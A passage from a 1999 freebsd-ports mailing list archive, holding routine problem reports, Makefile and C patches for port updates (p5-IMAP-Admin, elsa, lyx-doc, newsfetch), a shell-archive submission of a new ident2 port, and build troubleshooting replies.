4.0-CURRENT #12: Sun Nov 28 20:46:10 EST 1999 ----- Chris D. Faulhaber | All the true gurus I've met never System/Network Administrator, | claimed they were one, and always Reality Check Information, Inc. | pointed to someone better. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Nov 30 7:40: 7 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id D62EE15920 for ; Tue, 30 Nov 1999 07:40:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id HAA97569; Tue, 30 Nov 1999 07:40:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from server.research.zopps.fi (ws99.research.zopps.fi [195.165.196.99]) by hub.freebsd.org (Postfix) with ESMTP id 6DBB315920 for ; Tue, 30 Nov 1999 07:34:18 -0800 (PST) (envelope-from martti@research.zopps.fi) Received: (from uucp@localhost) by server.research.zopps.fi (8.9.3/8.9.3) id RAA52130 for ; Tue, 30 Nov 1999 17:34:16 +0200 (EET) (envelope-from martti.kuparinen) Received: from ws125.research.zopps.fi(195.165.196.125) via SMTP by ws99.research.zopps.fi, id smtpdO52126; Tue Nov 30 17:34:12 1999 Received: (from martti@localhost) by ws125.research.zopps.fi (8.9.3/8.8.8) id RAA03616; Tue, 30 Nov 1999 17:34:12 +0200 (EET) (envelope-from martti@research.zopps.fi) Message-Id: <199911301534.RAA03616@ws125.research.zopps.fi> Date: Tue, 30 Nov 1999 17:34:12 +0200 (EET) From: martti.kuparinen@ericsson.com Reply-To: martti.kuparinen@ericsson.com To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15188: [PATCH] ports/mail/p5-IMAP-Admin upgrade Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15188 >Category: ports >Synopsis: [PATCH] ports/mail/p5-IMAP-Admin upgrade >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Tue Nov 30 07:40:02 PST 1999 >Closed-Date: >Last-Modified: >Originator: Martti Kuparinen >Release: FreeBSD 3.3-RELEASE i386 >Organization: Oy L M Ericsson Ab >Environment: >Description: I have updated the p5-IMAP-Admin port to version 1.0.1 >How-To-Repeat: >Fix: *** Makefile.orig Wed Nov 24 18:37:44 1999 --- Makefile Wed Nov 24 18:38:14 1999 *************** *** 6,13 **** # $FreeBSD: ports/mail/p5-IMAP-Admin/Makefile,v 1.1.1.1 1999/09/27 05:13:04 dan Exp $ # ! DISTNAME= IMAP-Admin-0.8.2 ! PKGNAME= p5-IMAP-Admin-0.8.2 CATEGORIES= mail perl5 MASTER_SITES= ${MASTER_SITE_PERL_CPAN} MASTER_SITE_SUBDIR= IMAP --- 6,13 ---- # $FreeBSD: ports/mail/p5-IMAP-Admin/Makefile,v 1.1.1.1 1999/09/27 05:13:04 dan Exp $ # ! DISTNAME= IMAP-Admin-1.0.1 ! PKGNAME= p5-IMAP-Admin-1.0.1 CATEGORIES= mail perl5 MASTER_SITES= ${MASTER_SITE_PERL_CPAN} MASTER_SITE_SUBDIR= IMAP *** files/md5.orig Wed Nov 24 18:37:51 1999 --- files/md5 Wed Nov 24 18:38:33 1999 *************** *** 1 **** ! MD5 (IMAP-Admin-0.8.2.tar.gz) = a671b77794702f1514fd931b4a7b001e --- 1 ---- ! MD5 (IMAP-Admin-1.0.1.tar.gz) = 1803c4e8285c54204090a7b5ece7042e >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Nov 30 8: 2:30 1999 Delivered-To: freebsd-ports@freebsd.org Received: from jade.chc-chimes.com (jade.chc-chimes.com [216.28.46.6]) by hub.freebsd.org (Postfix) with ESMTP id CBD8B1583C for ; Tue, 30 Nov 1999 08:02:26 -0800 (PST) (envelope-from billf@chc-chimes.com) Received: by jade.chc-chimes.com (Postfix, from userid 1001) id 7671F1C5D; Tue, 30 Nov 1999 10:03:30 -0500 (EST) Received: from localhost (localhost [127.0.0.1]) by jade.chc-chimes.com (Postfix) with ESMTP id 71B54381B; Tue, 30 Nov 1999 10:03:30 -0500 (EST) Date: Tue, 30 Nov 1999 10:03:30 -0500 (EST) From: Bill Fumerola To: Dag-Erling Smorgrav Cc: ports@freebsd.org Subject: Re: pgnus-0.98 In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 30 Nov 1999, Dag-Erling Smorgrav wrote: > Attached are patches for a port of Pterodactyl Gnus 0.98. Any comments > before I import it? The makefile has many style bugs. please look at other Makefiles and use portlint. -- - bill fumerola - billf@chc-chimes.com - BF1560 - computer horizons corp - - ph:(800) 252-2421 - bfumerol@computerhorizons.com - billf@FreeBSD.org - To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Nov 30 10:30: 6 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 8DF5F159BE for ; Tue, 30 Nov 1999 10:30:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA22039; Tue, 30 Nov 1999 10:30:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from pawn.primelocation.net (pawn.primelocation.net [205.161.238.235]) by hub.freebsd.org (Postfix) with ESMTP id 84DC3159A1 for ; Tue, 30 Nov 1999 10:21:30 -0800 (PST) (envelope-from jedgar@pawn.primelocation.net) Received: by pawn.primelocation.net (Postfix, from userid 1003) id 627CA9B36; Tue, 30 Nov 1999 13:21:29 -0500 (EST) Message-Id: <19991130182129.627CA9B36@pawn.primelocation.net> Date: Tue, 30 Nov 1999 13:21:29 -0500 (EST) From: jedgar@fxp.org Reply-To: jedgar@fxp.org To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15191: Update port: net/elsa Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15191 >Category: ports >Synopsis: Update port: net/elsa >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Tue Nov 30 10:30:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Chris D. Faulhaber >Release: FreeBSD 4.0-CURRENT i386 >Organization: BUGO - BSD Users Group of Orlando >Environment: FreeBSD 4.0-CURRENT i386 >Description: Update port: net/elsa * Update to 1.0b-017 * Make logging dir more configurable * Add pid file support * BROKEN for -current as it requires libc_r.so.3 which is not in compat3x. This will be un-BROKEN when libc_r.so.3 is added to compat3x. >How-To-Repeat: >Fix: Index: Makefile =================================================================== RCS file: /home/ncvs/ports/net/elsa/Makefile,v retrieving revision 1.1.1.1 diff -u -r1.1.1.1 Makefile --- Makefile 1999/11/10 23:53:56 1.1.1.1 +++ Makefile 1999/11/30 18:00:13 @@ -1,5 +1,5 @@ # New ports collection makefile for: elsa -# Version required: 1.0 +# Version required: 1.0b-017 # Date created: 06 October 1999 # Whom: Chris D. Faulhaber # @@ -7,7 +7,7 @@ # DISTNAME= elsa-freebsd_x86 -PKGNAME= elsa-1.0b +PKGNAME= elsa-1.0b-017 CATEGORIES= net MASTER_SITES= "" @@ -16,23 +16,27 @@ ONLY_FOR_ARCHS= i386 RESTRICTED= "LIC: redistribution not allowed" -WRKSRC= ${WRKDIR}/ELSA-1_0b-016-freebsd_x86 +WRKSRC= ${WRKDIR}/ELSA-1_0b-017-freebsd_x86 NO_BUILD= yes +LOG_DIR?= /var/log/elsa .include +.if ${OSVERSION} > 400000 +BROKEN= "Requires libc_r.so.3 which is not in compat3x" +.endif + .if !exists(${DISTDIR}/${DISTNAME}${EXTRACT_SUFX}) IGNORE='The source to this port may not be automatically fetched due to licensing restrictions. You MUST fetch the source manually after registering at: http://streaming.entera.com/orderform.shtml Once ${DISTFILES} has been downloaded, move it to ${DISTDIR} and then restart this build.' .endif do-configure: - @${MV} ${WRKSRC}/elsa.cfg ${WRKSRC}/elsa.cfg.orig - @${SED} -e 's|CHANGE_ME|${PREFIX}/share/elsa|' \ - < ${WRKSRC}/elsa.cfg.orig > ${WRKSRC}/elsa.cfg + @${PERL} -pi.orig -e 's|__PREFIX__|${PREFIX}|' ${WRKSRC}/elsa.cfg + @${PERL} -pi.orig -e 's|__LOG_DIR__|${LOG_DIR}|' ${WRKSRC}/elsa.cfg do-install: ${MKDIR} ${PREFIX}/share/elsa/content - ${MKDIR} /var/log/elsa + ${MKDIR} ${LOG_DIR} ${INSTALL_SCRIPT} ${WRKSRC}/elsa ${PREFIX}/sbin ${INSTALL_DATA} ${WRKSRC}/elsa.cfg ${PREFIX}/etc ${INSTALL_DATA} ${WRKSRC}/LICENSE ${PREFIX}/share/elsa Index: files/md5 =================================================================== RCS file: /home/ncvs/ports/net/elsa/files/md5,v retrieving revision 1.1.1.1 diff -u -r1.1.1.1 md5 --- md5 1999/11/10 23:53:56 1.1.1.1 +++ md5 1999/11/30 18:00:13 @@ -1 +1 @@ -MD5 (elsa-freebsd_x86.tar.gz) = cc53ab9100d23d81bfcfd27090524912 +MD5 (elsa-freebsd_x86.tar.gz) = 68bca29c7fc60cea46bde698933f12fa Index: patches/patch-aa =================================================================== RCS file: /home/ncvs/ports/net/elsa/patches/patch-aa,v retrieving revision 1.1.1.1 diff -u -r1.1.1.1 patch-aa --- patch-aa 1999/11/10 23:53:56 1.1.1.1 +++ patch-aa 1999/11/30 18:00:13 @@ -1,10 +1,11 @@ ---- elsa.cfg.orig Thu Sep 30 17:27:22 1999 -+++ elsa.cfg Wed Oct 6 21:48:19 1999 -@@ -1,5 +1,5 @@ +--- elsa.cfg.orig Mon Nov 29 21:42:06 1999 ++++ elsa.cfg Tue Nov 30 12:42:55 1999 +@@ -1,5 +1,6 @@ [config] -CONTENT_DIR=content -LOGGING_DIR=. -+CONTENT_DIR=CHANGE_ME/content -+LOGGING_DIR=/var/log/elsa ++CONTENT_DIR=__PREFIX__/share/elsa/content ++LOGGING_DIR=__LOG_DIR__ LOGGING=yes LOGGING_DEBUG=yes ++PID_FILE=/var/run/elsa.pid >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Nov 30 10:48:46 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 5A01A15AB0; Tue, 30 Nov 1999 10:48:29 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Received: (from cpiazza@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA24593; Tue, 30 Nov 1999 10:48:29 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Date: Tue, 30 Nov 1999 10:48:29 -0800 (PST) From: Message-Id: <199911301848.KAA24593@freefall.freebsd.org> To: jedgar@fxp.org, cpiazza@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15185: Update port: news/pan Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update port: news/pan State-Changed-From-To: open->closed State-Changed-By: cpiazza State-Changed-When: Tue Nov 30 10:48:11 PST 1999 State-Changed-Why: Update committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Nov 30 13: 0: 6 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 6580615A34 for ; Tue, 30 Nov 1999 13:00:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id NAA41947; Tue, 30 Nov 1999 13:00:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 950F715A2B; Tue, 30 Nov 1999 12:58:36 -0800 (PST) Message-Id: <19991130205836.950F715A2B@hub.freebsd.org> Date: Tue, 30 Nov 1999 12:58:36 -0800 (PST) From: rod@zort.on.ca To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: ports/15192: Ident2 Daemon Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15192 >Category: ports >Synopsis: Ident2 Daemon >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Tue Nov 30 13:00:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Rod Taylor >Release: >Organization: Zort >Environment: >Description: This port easily enables those of us with Natd to generate random replies to ident requests. >How-To-Repeat: >Fix: # This is a shell archive. Save it in a file, remove anything before # this line, and then unpack it by entering "sh file". Note, it may # create directories; files and directories will be owned by you and # have default permissions. # # This archive contains: # # ident2 # ident2/files # ident2/files/md5 # ident2/pkg # ident2/pkg/COMMENT # ident2/pkg/DESCR # ident2/pkg/PLIST # ident2/Makefile # echo c - ident2 mkdir -p ident2 > /dev/null 2>&1 echo c - ident2/files mkdir -p ident2/files > /dev/null 2>&1 echo x - ident2/files/md5 sed 's/^X//' >ident2/files/md5 << 'END-of-ident2/files/md5' XMD5 (ident2-v1.0_FINAL.tar.gz) = 6d6f5b90d9af84c42ffb37e70c81f3d8 END-of-ident2/files/md5 echo c - ident2/pkg mkdir -p ident2/pkg > /dev/null 2>&1 echo x - ident2/pkg/COMMENT sed 's/^X//' >ident2/pkg/COMMENT << 'END-of-ident2/pkg/COMMENT' XAn RFC1413 identification server which also supports random replies. END-of-ident2/pkg/COMMENT echo x - ident2/pkg/DESCR sed 's/^X//' >ident2/pkg/DESCR << 'END-of-ident2/pkg/DESCR' XThis ident daemon runs as either a standalong daemon or as a child of inetd. XReplies of your choice can be generated through a .ident file in the users Xhome directory. A .noident will make it do an ident will not be conducted Xif the file is found in the users home directory. X XThe server can also send random replies to all requests. This simplifies Xthe problem of using IRC through a NATD network. END-of-ident2/pkg/DESCR echo x - ident2/pkg/PLIST sed 's/^X//' >ident2/pkg/PLIST << 'END-of-ident2/pkg/PLIST' Xsbin/identd2 END-of-ident2/pkg/PLIST echo x - ident2/Makefile sed 's/^X//' >ident2/Makefile << 'END-of-ident2/Makefile' X# New ports collection makefile for: ident2 X# Version required: 1.0 X# Date created: 30 Nov 1999 X# Whom: rod@zort.on.ca X# X# $FreeBSD: ports/security/pidentd/Makefile,v 1.28 1999/09/23 04:27:10 billf Exp $ X# X XDISTNAME= ident2-v1.0_FINAL XPKGNAME= ident2-1.0 XCATEGORIES= security net XMASTER_SITES= http://www.nyct.net/~defile/programs/ident2/ \ X http://www.oscentral.org/files/software/ X XMAINTAINER= rod@zort.on.ca X XGNU_CONFIGURE= yes XMAN8= ident2.8 X X.include END-of-ident2/Makefile exit >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Nov 30 16:20:42 1999 Delivered-To: freebsd-ports@freebsd.org Received: from limmax.k2r.org (limmax.k2r.org [210.160.188.69]) by hub.freebsd.org (Postfix) with SMTP id C58EC15910 for ; Tue, 30 Nov 1999 16:20:27 -0800 (PST) (envelope-from kenji@k2r.org) Received: (qmail 70822 invoked by uid 1000); 1 Dec 1999 00:18:03 -0000 Message-ID: <19991201001803.70821.qmail@k2r.org> Date: Wed, 1 Dec 1999 09:18:03 +0900 (JST) From: Kenji Rikitake X-Sender: kenji@limmax.k2r.org To: Kentaro Inagaki / =?iso-2022-jp?B?GyRCMHAzQBsoQiAbJEI3ckJATzobKEI=?= Cc: kenji.rikitake@acm.org, freebsd-ports@FreeBSD.ORG Subject: Re: ports/15184: ja-ptex-common-2.1.8 fails to execute on 3.3-RELEASE In-Reply-To: <19991201022000H.inagaki@tg.rim.or.jp> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=ISO-2022-JP Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 1 Dec 1999, Kentaro Inagaki / $B0p3@(B $B7rB@O:(B wrote: > Please confirm existence of /usr/local/lib/libkpathsea*. > And please do `ldconfig -elf -r' if it exists. When I tried to build I wasn't able to create libpkathsea.so.3. I didn't have time to keep track on this so I installed the package of 3.3-RELEASE instead so far. // Kenji Rikitake To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Nov 30 16:34:35 1999 Delivered-To: freebsd-ports@freebsd.org Received: from limmax.k2r.org (limmax.k2r.org [210.160.188.69]) by hub.freebsd.org (Postfix) with SMTP id B675715A06 for ; Tue, 30 Nov 1999 16:34:16 -0800 (PST) (envelope-from kenji@k2r.org) Received: (qmail 75894 invoked by uid 1000); 1 Dec 1999 00:31:48 -0000 Message-ID: <19991201003148.75893.qmail@k2r.org> Date: Wed, 1 Dec 1999 09:31:48 +0900 (JST) From: Kenji Rikitake X-Sender: kenji@limmax.k2r.org To: Kentaro Inagaki / =?iso-2022-jp?B?GyRCMHAzQBsoQiAbJEI3ckJATzobKEI=?= Cc: kenji.rikitake@acm.org, freebsd-ports@FreeBSD.ORG Subject: Re: ports/15184: ja-ptex-common-2.1.8 fails to execute on 3.3-RELEASE In-Reply-To: <19991201022000H.inagaki@tg.rim.or.jp> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=ISO-2022-JP Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 1 Dec 1999, Kentaro Inagaki / $B0p3@(B $B7rB@O:(B wrote: > Please confirm existence of /usr/local/lib/libkpathsea*. > And please do `ldconfig -elf -r' if it exists. I tried this again. The important thing I didn't write was that I was first trying to build ja-ptex-euc-2.1.8 and then ja-ptex-common-2.1.8 inside it. Retrying this by building ja-ptex-common-2.1.8 first, it was successfully done. > I confirmed build on 4.0-CURRENT. It was 3.3-RELEASE, upgraded from 2.2.8-STABLE, with the a.out versions of old ptex files. // Kenji Rikitake To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Nov 30 21:40: 7 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 03C6E15A4B for ; Tue, 30 Nov 1999 21:40:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id VAA84212; Tue, 30 Nov 1999 21:40:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from ms.tokyo.jcom.ne.jp (ms.tokyo.jcom.ne.jp [210.234.123.18]) by hub.freebsd.org (Postfix) with ESMTP id BAF5714DDA for ; Tue, 30 Nov 1999 21:31:05 -0800 (PST) (envelope-from musha@ms.tokyo.jcom.ne.jp) Received: from daemon.local.idaemons.org (pc343031.tokyo.jcom.ne.jp [203.140.143.31]) by ms.tokyo.jcom.ne.jp (8.9.1/3.7W 06/01/99) with ESMTP id OAA20215 for ; Wed, 1 Dec 1999 14:31:04 +0900 (JST) Received: by daemon.local.idaemons.org (8.9.3/3.7W) id OAA01583; Wed, 1 Dec 1999 14:29:57 +0900 (JST) Message-Id: <86g0xnz0ru.wl@localhost.local.idaemons.org> Date: Wed, 01 Dec 1999 14:29:57 +0900 From: Akinori MUSHA aka knu To: FreeBSD-gnats-submit@freebsd.org Subject: ports/15199: Patch for newsfetch Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15199 >Category: ports >Synopsis: Patch for newsfetch >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Tue Nov 30 21:40:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Akinori MUSHA aka knu >Release: FreeBSD 3.3-STABLE i386 >Organization: A.I.D. >Environment: FreeBSD 3.3-STABLE i386 + ports-current >Description: Newsfetch hardcodes the port number (119) for NNTP, but in some cases we may need to specify it other than the default number, for instance ssh's port-forwarding case. >How-To-Repeat: >Fix: Add the following patches to the port, and newsfetch will also accept news server's name in 'host:port' style as well as 'host' which equals to 'host:119'. I fedback this to the author of newsfetch a couple month ago, but had no reply, still I really need it... --Multipart_Wed_Dec__1_14:29:57_1999-1 Content-Type: text/plain; charset=US-ASCII Content-Disposition: attachment; filename="patch-ab" Content-Transfer-Encoding: 7bit --- newsfetch.c.orig Thu Jul 23 18:28:56 1998 +++ newsfetch.c Wed Dec 1 13:56:52 1999 @@ -7,6 +7,7 @@ #include +#include #include #include #include @@ -28,6 +29,7 @@ int wait_after_articles = 0, articles_fetched=0, last_than_current; int wait_for_time = 0, timeout=READ_TIMEOUT, article_fetching=0; int cleanup=1, max_article, news_target=0, first_article, only_list=0; +int port = 119; char group[100], pipe_command[100]; FILE *rcfp, *rctmpfp, *socket_fp[2]; char lockfile[100]; @@ -59,6 +61,16 @@ getHomedir(homedir); strcpy(hostname,argv[1]); + { + char *p; + int n; + + if (NULL != (p = strchr(hostname, ':')) && 0 < (n = atoi(p + 1))) { + port = n; + *p = '\0'; + } + } + get_commandline(argc, argv, dirname, rcfile, &cleanup, &wait_after_articles, &wait_for_time, &command_flag, execute_command, @@ -75,7 +87,7 @@ generateProcmailrc(homedir, rcfile, dirname, pipe_command); } - socket_id=ConnectServer(hostname,119, 0); + socket_id=ConnectServer(hostname, port, 0); /* two file descriptor are for portability among diff systems */ createFd(socket_id, socket_fp); --Multipart_Wed_Dec__1_14:29:57_1999-1 Content-Type: text/plain; charset=US-ASCII Content-Disposition: attachment; filename="patch-ac" Content-Transfer-Encoding: 7bit --- newsfetch.1.orig Tue Apr 14 20:04:25 1998 +++ newsfetch.1 Wed Dec 1 13:29:35 1999 @@ -5,7 +5,7 @@ .SH SYNOPSIS .B newsfetch .BI -hostname +hostname[:port] [ .BI \-clsyvV ] --Multipart_Wed_Dec__1_14:29:57_1999-1-- >Release-Note: >Audit-Trail: >Unformatted: --Multipart_Wed_Dec__1_14:29:57_1999-1 Content-Type: text/plain; charset=US-ASCII To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Nov 30 23:20: 8 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 7EB4215A87 for ; Tue, 30 Nov 1999 23:20:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id XAA92436; Tue, 30 Nov 1999 23:20:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from pis.toba-cmt.ac.jp (pis.toba-cmt.ac.jp [202.26.248.77]) by hub.freebsd.org (Postfix) with ESMTP id E36EE14E1F for ; Tue, 30 Nov 1999 23:14:04 -0800 (PST) (envelope-from kiri@pis.toba-cmt.ac.jp) Received: (from kiri@localhost) by pis.toba-cmt.ac.jp (8.9.3/8.9.3) id QAA34944; Wed, 1 Dec 1999 16:13:08 +0900 (JST) (envelope-from kiri) Message-Id: <199912010713.QAA34944@pis.toba-cmt.ac.jp> Date: Wed, 1 Dec 1999 16:13:08 +0900 (JST) From: KIRIYAMA Kazuhiko Reply-To: kiri@pis.toba-cmt.ac.jp To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15200: Update ports: ja-lyx_doc-1.0.3(japanese/lyx-doc) Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15200 >Category: ports >Synopsis: Update ports: ja-lyx_doc-1.0.3(japanese/lyx-doc) >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Tue Nov 30 23:20:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: KIRIYAMA Kazuhiko >Release: FreeBSD 4.0-CURRENT i386 >Organization: Toba National College of Maritime Technology. Department of Electronic Mechanical Engineering >Environment: >Description: Updated the port ja-lyx_doc-1.0.3(japanese/lyx-doc). Current modifications are : (1) change md5 and PLIST according to distfiles. (2) change install directory. I put the diff from ports-current in "Fix:". >How-To-Repeat: >Fix: diff -u -r -x CVS -x work -x *~ -x *.orig -N -I ^#.*\$Id.*$ -I ^# \$FreeBSD /usr/ports/current/japanese/lyx-doc/Makefile ./Makefile --- /usr/ports/current/japanese/lyx-doc/Makefile Sun Nov 14 12:55:50 1999 +++ ./Makefile Wed Dec 1 16:10:08 1999 @@ -6,7 +6,7 @@ # $FreeBSD: ports/japanese/lyx-doc/Makefile,v 1.1.1.1 1999/11/14 03:55:50 steve Exp $ # -DISTNAME= jp_LyX_Doc.1.0.3 +DISTNAME= ja_LyX_Doc.1.0.3 PKGNAME= ja-lyx_doc-1.0.3 CATEGORIES= japanese print MASTER_SITES= http://www.hiei.kit.ac.jp/~hitomi/lyx/ @@ -16,10 +16,10 @@ NO_BUILD= yes NO_WRKSUBDIR= yes -PORTDOCDIR= ${PREFIX}/share/doc/lyx +LYXDOCDIR= ${PREFIX}/share/lyx/doc do-install: - ${MKDIR} ${PORTDOCDIR} - ${INSTALL_DATA} ${WRKDIR}/*.lyx ${WRKDIR}/*.eps ${PORTDOCDIR} + ${MKDIR} ${LYXDOCDIR} + ${INSTALL_DATA} ${WRKDIR}/*.lyx ${WRKDIR}/*.eps ${LYXDOCDIR} .include diff -u -r -x CVS -x work -x *~ -x *.orig -N -I ^#.*\$Id.*$ -I ^# \$FreeBSD /usr/ports/current/japanese/lyx-doc/files/md5 ./files/md5 --- /usr/ports/current/japanese/lyx-doc/files/md5 Sun Nov 14 12:55:50 1999 +++ ./files/md5 Wed Dec 1 12:45:06 1999 @@ -1 +1 @@ -MD5 (jp_LyX_Doc.1.0.3.tar.gz) = 4d916a1ea308baf99193db79ff12a881 +MD5 (ja_LyX_Doc.1.0.3.tar.gz) = 792ff7f2985874b8cbb72f82d5be253e diff -u -r -x CVS -x work -x *~ -x *.orig -N -I ^#.*\$Id.*$ -I ^# \$FreeBSD /usr/ports/current/japanese/lyx-doc/pkg/COMMENT ./pkg/COMMENT --- /usr/ports/current/japanese/lyx-doc/pkg/COMMENT Sun Nov 14 12:55:50 1999 +++ ./pkg/COMMENT Wed Nov 10 06:48:00 1999 @@ -1 +1 @@ -Japanese Lyx documents translated from original ones +Japanese Lyx documents translated from original ones. diff -u -r -x CVS -x work -x *~ -x *.orig -N -I ^#.*\$Id.*$ -I ^# \$FreeBSD /usr/ports/current/japanese/lyx-doc/pkg/DESCR ./pkg/DESCR --- /usr/ports/current/japanese/lyx-doc/pkg/DESCR Sun Nov 14 12:55:50 1999 +++ ./pkg/DESCR Wed Dec 1 13:02:09 1999 @@ -4,7 +4,7 @@ This port provide Japanese documents translated from original ones. All these translation have been established by -Mr. HITOMI Koutarou. I've +Mr. HITOMI Kohtaro. I've great thanks to him. -KIRIYAMA Kazuhiko diff -u -r -x CVS -x work -x *~ -x *.orig -N -I ^#.*\$Id.*$ -I ^# \$FreeBSD /usr/ports/current/japanese/lyx-doc/pkg/PLIST ./pkg/PLIST --- /usr/ports/current/japanese/lyx-doc/pkg/PLIST Sun Nov 14 12:55:50 1999 +++ ./pkg/PLIST Wed Dec 1 13:04:42 1999 @@ -1,10 +1,9 @@ -share/doc/lyx/escher-lsd.eps -share/doc/lyx/jp_Intro.lyx -share/doc/lyx/jp_Tutorial-1-0-3.lyx -share/doc/lyx/jp_UserGuide-1-0-3.lyx -share/doc/lyx/jp_example_lyxified.lyx -share/doc/lyx/jp_example_raw.lyx -share/doc/lyx/jp_splash.lyx -share/doc/lyx/mobius.eps -share/doc/lyx/platypus.eps -@dirrm share/doc/lyx +share/lyx/doc/escher-lsd.eps +share/lyx/doc/ja_Customization.lyx +share/lyx/doc/ja_Customization_draft.lyx +share/lyx/doc/ja_Intro.lyx +share/lyx/doc/ja_Tutorial.lyx +share/lyx/doc/ja_UserGuide.lyx +share/lyx/doc/mobius.eps +share/lyx/doc/platypus.eps +@dirrm share/lyx/doc >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 1 1:39:16 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 549C514D33; Wed, 1 Dec 1999 01:39:15 -0800 (PST) (envelope-from nakai@FreeBSD.org) Received: (from nakai@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id BAA04184; Wed, 1 Dec 1999 01:39:15 -0800 (PST) 